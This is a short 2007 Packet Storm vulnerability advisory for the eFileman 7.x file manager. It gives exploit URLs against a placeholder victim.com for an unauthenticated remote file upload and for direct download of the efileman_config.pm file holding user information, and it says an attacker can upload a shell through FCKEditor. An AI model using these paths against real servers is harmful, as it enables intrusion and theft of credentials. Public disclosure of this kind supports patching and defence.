efileman-multi.txt

2007-10-23T00:00:00
ID PACKETSTORM:60351
Type packetstorm
Reporter Xcross87
Modified 2007-10-23T00:00:00

Description

                                        
                                            `Software : eFileman  
Version : 7.x (tested on 7.1.0.87-88)  
Found by : Xcross87  
  
A. Remote File Upload Vulnerability :  
  
Xploit :  
  
http://victim.com/[path]/upload.html  
http://victim.com/[path]/cgi-bin/efileman/upload.cgi  
  
The uploaded files are stored in :  
http://victim.com/[path]/uploads/upload_file.xxx  
  
B. Direct Access or Download Configuration File  
Xploit :  
http://victim.com/[path]/cgi-bin/efileman/efileman_config.pm <-- check user information  
  
C. FCKEditor Inclusion.  
For full pack of eFileman installation including FCKEditor, attacker can up shell through upload vulnerability of FCK  
  
=== Xcross87 | HCETeam Xploiter ===  
`